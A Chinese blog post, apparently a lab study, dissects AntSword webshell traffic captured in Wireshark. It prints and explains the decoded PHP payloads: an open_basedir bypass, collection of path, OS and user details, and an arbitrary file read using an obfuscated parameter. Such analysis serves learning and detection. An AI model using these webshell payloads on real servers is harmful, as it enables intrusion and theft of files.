![](https://img-blog.csdnimg.cn/img_convert/101d35b7aed3d87c570e346145462ef2.png)
蚁剑连接并同时用wireshark抓取流量
![](https://img-blog.csdnimg.cn/img_convert/a428581a1b9575fc4cb63b13bcb631ce.png)
1274 行,追踪tcp流
![](https://img-blog.csdnimg.cn/img_convert/788b904369871f542cbd91d746572762.png)
因为我们的php.php内容是 $_POST['pass'],所以这里是post了一个pass参数,后面跟上了命令。通过站长工具-URL解码/编码 (wetimer.com)url解码、PHP格式化,在线美化PHP代码-站长工具 (senlt.cn)看一下:
@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir=@ini_get("open_basedir");
if($opdir) {
$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);
@array_push($oparr,$ocwd,sys_get_temp_dir());
foreach($oparr as $item) {
if(!@is_writable($item)) {
continue;
};
$tmdir=$item."/.4044a0d3a48";
@mkdir($tmdir);
if(!@file_exists($tmdir)) {
continue;
}
$tmdir=realpath($tmdir);
@chdir($tmdir);
@ini_set("open_basedir", "..");
$cntarr=@preg_split("/\\\\|\//",$tmdir);
for ($i=0;$i<sizeof($cntarr);$i++) {
@chdir("..");
};
@ini_set("open_basedir","/");
@rmdir($tmdir);
break;
};
};;
function asenc($out) {
return $out;
};
function asoutput() {
$output=ob_get_contents();
ob_end_clean();
echo "e7986"."0ff41";
echo @asenc($output);
echo "e7a7"."504c";
}
ob_start();
try {
$D=dirname($_SERVER["SCRIPT_FILENAME"]);
if($D=="")
$D=dirname($_SERVER["PATH_TRANSLATED"]);
$R="{$D} ";
if(substr($D,0,1)!="/") {
foreach(range("C","Z")as $L)
if(is_dir("{$L}:"))
$R.="{$L}:";
} else {
$R.="/";
}
$R.=" ";
$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";
$s=($u)?$u["name"]:@get_current_user();
$R.=php_uname();
$R.=" {$s}";
echo $R;;
} catch(Exception $e) {
echo "ERROR://".$e->getMessage();
};
asoutput();
die();
从上往下分析:
@ini_set(“display_errors”, “0”);是临时关闭PHP的错误显示功能
![](https://img-blog.csdnimg.cn/img_convert/1aa536b16f97aa4d816778c78055c874.png)
@set_time_limit(0);是设置执行时间,为零说明永久执行直到程序结束,是为了防止像dir、上传文件大马时超时
![](https://img-blog.csdnimg.cn/img_convert/440181eedd4aaede616b9dd4e51dbf6a.png)
asenc函数:简单的接收参数然后直接返回
![](https://img-blog.csdnimg.cn/img_convert/e5bd95ae57825935ac0606800a092ad6.png)
asoutput函数:先用ob_get_contents得到缓冲区的数据。然后用ob_end_clean清除缓冲区的内容,并将缓冲区关闭。然后把接收到的缓冲区数据输出
![](https://img-blog.csdnimg.cn/img_convert/df65cb9bbccc046ab419de69e79aa505.png)
ob_start()是在服务器打开一个缓冲区来保存所有的输出
![](https://img-blog.csdnimg.cn/img_convert/b8e11d71608976b06a3aa9b7adc4e138.png)
try里面:
$_SERVER[“SCRIPT_FILENAME”]是获取当前执行脚本的绝对路径。
dirname() 函数返回路径中的目录名称部分,也就是说$D是当前执行脚本所在的目录。
![](https://img-blog.csdnimg.cn/img_convert/2b4feb8bffcaf06ce6c91b154caea5fb.png)
如果$D为空,那么就用$_SERVER[“PATH_TRANSLATED”]获取当前脚本所在文件系统(不是文档根目录)的基本路径。这是在服务器进行虚拟到真实路径的映像后的结果。
![](https://img-blog.csdnimg.cn/img_convert/293b1c3a10e6a9da0ead85827a752d31.png)
然后把获取到的$D加上TAB赋值给$R
![](https://img-blog.csdnimg.cn/img_convert/ad1e03c03f3d543799eb1ff3bcb277f8.png)
然后下面的if:
先判断$D的第一位是不是/,这里应该是在判断是linux系统还是windows系统。
假如是windows,就从C到Z循环,is_dir是判断是否存在这个盘符目录。假如存在这个盘符就添加在$R的后面。
![](https://img-blog.csdnimg.cn/img_convert/b5ffdd45f70e77558343631e92f5925f.png)
然后就是判断posix_getegid函数是否存在,如果存在posix_getegid函数存在就获取信息赋值给$u,否则$u为空
![](https://img-blog.csdnimg.cn/img_convert/8608026568cf07f3eb3212625d3dbc83.png)
然后下面判断$u是否为空,假如不为空就获取键值为name的值给$s,否则用get_current_user函数获取当前PHP脚本所有者的名称赋值给$s。
![](https://img-blog.csdnimg.cn/img_convert/d2239146d0ab5528dbceae4169cb1d6e.png)
然后用 php_uname 函数获取 有关正在运行的操作系统PHP的信息,并将其添加在$R后面,然后把上面获取的$s也添加在$R后面。然后输出$R。
![](https://img-blog.csdnimg.cn/img_convert/8ecf5ac3ea05e34c000be993db1f5e3d.png)
假如出错就返回错误信息:
![](https://img-blog.csdnimg.cn/img_convert/ab69437f9b7c3af0c8982e150196787a.png)
再看一下数据包返回信息,就理解了上面这些代码是干嘛的:
![](https://img-blog.csdnimg.cn/img_convert/f362bfb96f32f32e5270573aeece08d3.png)
当前执行脚本所在的路径 正在运行的操作系统PHP的信息 当前PHP脚本所有者的名称
1281行,打开了一个php文件,看一下发送的指令:
![](https://img-blog.csdnimg.cn/img_convert/f771874a86072a6d1f8943a74adcc45a.png)
@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir=@ini_get("open_basedir");
if($opdir) {
$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);
@array_push($oparr,$ocwd,sys_get_temp_dir());
foreach($oparr as $item) {
if(!@is_writable($item)) {
continue;
};
$tmdir=$item."/.f01ac485ec";
@mkdir($tmdir);
if(!@file_exists($tmdir)) {
continue;
}
$tmdir=realpath($tmdir);
@chdir($tmdir);
@ini_set("open_basedir", "..");
$cntarr=@preg_split("/\\\\|\//",$tmdir);
for ($i=0;$i<sizeof($cntarr);$i++) {
@chdir("..");
};
@ini_set("open_basedir","/");
@rmdir($tmdir);
break;
};
};;
function asenc($out) {
return $out;
};
function asoutput() {
$output=ob_get_contents();
ob_end_clean();
echo "4a1"."c31";
echo @asenc($output);
echo "503d"."eaf6";
}
ob_start();
try {
$F=base64_decode(substr($_POST["u928cced13ca85"],2));
$P=@fopen($F,"r");
echo(@fread($P,filesize($F)?filesize($F):4096));
@fclose($P);;
} catch(Exception $e) {
echo "ERROR://".$e->getMessage();
};
asoutput();
die();
&u928cced13ca85=RNL3Zhci93d3cvZHZ3YS9oYWNrYWJsZS91cGxvYWRzL3Bhc3MucGhw
看下try里面的内容:
将从POST传过来的u928cced13ca85变量去掉前2个字符后再进行base64解码赋值给$F:
![](https://img-blog.csdnimg.cn/img_convert/ef76987117ed0d33cc21233dd2f5be51.png)
然后用只读的方式打开文件,然后读文件,假如文件大小为空就默认读4096字节,然后关闭文件流:
![](https://img-blog.csdnimg.cn/img_convert/e2140d4b3b730d5d45bb253a76b2f393.png)
在最后,传了上面所说的奇怪变量名参数u928cced13ca85
![](https://img-blog.csdnimg.cn/img_convert/14d8a560ef7448a937ef830c480fb9bf.png)
base64解码看看:
![](https://img-blog.csdnimg.cn/img_convert/2de5e4688ad2cccf34f6c7ab654b404b.png)